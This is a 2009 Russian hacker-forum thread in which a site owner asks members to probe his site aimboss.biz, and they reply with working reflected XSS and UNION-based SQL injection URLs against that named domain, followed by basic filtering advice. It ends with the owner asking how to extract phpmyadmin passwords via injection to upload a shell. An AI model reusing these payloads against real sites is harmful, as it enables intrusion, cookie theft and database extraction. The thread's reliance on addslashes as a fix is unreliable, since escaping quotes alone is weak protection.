Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   aimboss.biz (https://forum.antichat.xyz/showthread.php?t=126408)

DECIDE 22.06.2009 10:49

aimboss.biz
 
Пожалуйста проверьте мой сайт на уязвимости
если необходимо начислю кредитов и опишу возможности которых очень много и нужно всё отладить
Заранее спасибо!

BlackSun 22.06.2009 11:17

Пассивная XSS
http://aimboss.biz/?nvg=/user:<script>alert()</script>
http://aimboss.biz/?nvg=s-jsip:pinfo:</title></head><body><img src=.+onerror=alert()><!--
http://aimboss.biz/?nvg=t:message:"><script>alert()</script><!--

SQL-INJ
http://aimboss.biz/?nvg=/user::-1+union+select+concat_ws(0x3a,user(),version()),2, 3+--+
http://aimboss.biz/?nvg=weblog:pages:1,1,4,-1'+OR+1=1+--+
http://aimboss.biz/?nvg=s-jsip:pinfo:-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), version()),8+--+

wildshaman 22.06.2009 11:20

Пассивка:
http://aimboss.biz/?nvg=casino:rally:run"><script>alert()</script>

по-моему, она там везде :)

DECIDE 22.06.2009 11:55

спасибо, буду исправлять
ЗЫ. а как сделали столько много.. в онлайне?

BlackSun: хз, побочные эффекты

это понятно что это только цветочки.., главное что указали на то как не стоит делать, и что надо фильтровать Get запросы

BlackSun: фильровать надо всё, _GET, _POST, _COOKIE, _FILES, и тп. Все данные от пользователей.

BlackSun 22.06.2009 12:21

Продолжу в этом посте ..

SQL-INJ, http://aimboss.biz/?nvg=!site:z:usr
В поле ник:
Цитата:

%' union select 1,concat_ws(0x3a,user(),version()),3,4 -- -
Вывод в последней записи

http://aimboss.biz/?nvg=t:vfile:-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion())+--+

nemaniak 22.06.2009 12:26

Вот еще парочка...
http://aimboss.biz/?nvg=weblog:myblogs:-211+union+select+1,2,3,4,concat_ws(char(58),user() ,database(),version()),6,7,8,9,10,11,12,13,14--

http://aimboss.biz/?nvg=weblog:<script>alert()</script>

вообщем все баги идентичны

BlackSun 22.06.2009 12:36

Короче, думаю дальше уже нет смысла копать, идите на полную доработку, фильтрации нет вообще нигде. Потом уже действительно на проверку.

DECIDE 22.06.2009 12:43

как лучше производить фильтрацию?
от JS
strip_tags()
а от SQL-INJ
как можно обезопасится?

сегодня-завтра постараюсь всё исправить и надеюсь на дельнейшую помошь в поиске уязвимостей

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..

BlackSun 22.06.2009 12:50

addslashes(), inval(), маны по пыху в помошь. Есстественно, если в параметре может быть только число, то лучше использовать intval(), а не addslashes.

Цитата:

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..
Оно как то само))

DECIDE 22.06.2009 14:21

что даст addslashes()?
думаю бесполезная функция в данном случае

BlackSun 22.06.2009 14:40

Цитата:

Сообщение от DECIDE
что даст addslashes()?
думаю бесполезная функция в данном случае

addslashes экранирует кавычки.

DECIDE 22.06.2009 17:01

это понятно что экранирует
но надписи всё равно останутся на страничке, надо полностю исключить появления подобного эффекта, а не только экранировать выполнение инъекции ИМХО
поэтому желательно полностю отфильтровать, а не просто экранировать кавычки

DECIDE 22.06.2009 18:28

поставил фильтр, прошу посмотреть ещё какие могут быть уязвимости

BlackSun 22.06.2009 19:01

Рекомендую посмотреть в сторону PHP IDS - http://php-ids.org/ по тестам, хорошая система для зашиты скриптов.

DECIDE 22.06.2009 19:10

BlackSun, мы вообще-то русские люди, подобного на русском нет?

ЗЫ. и что за привычка посылать как футболист футболит мяч не умеющий играть..

Adm1n4eG 22.06.2009 20:13

Пассивная XSS
http://aimboss.biz/?kin=1<script>alert(document.cookie)</script>

DECIDE 22.06.2009 20:38

спасибо, исправил :)

DECIDE 23.06.2009 16:29

кто нибудь ещё что нибудь может найти?
сайт очень большой, дыр наверняка ещё очень много

DECIDE 24.06.2009 15:16

почему тишина? разве нет больше уязвимостей?
скажите свои ники я вам начислю кредитов и вы посмотрите как работает биржа, форум, панель заказов и др.
не хочется когда начнём запускать проект снова узнавать что есть баги..

DECIDE 27.06.2009 08:08

в соседней теме увидел
Цитата:

Через SQL-иньекцию найти пароли от phpmyadmin, которые ты не спрятал, и от туда залить шелл.
Найти пассы через SQL-иньекцию от админики и через админку залить шелл.
такое откровение :)

возник вопрос какими командами можно через инекцию узнать пароли от phpmyadmin?


Время: 09:34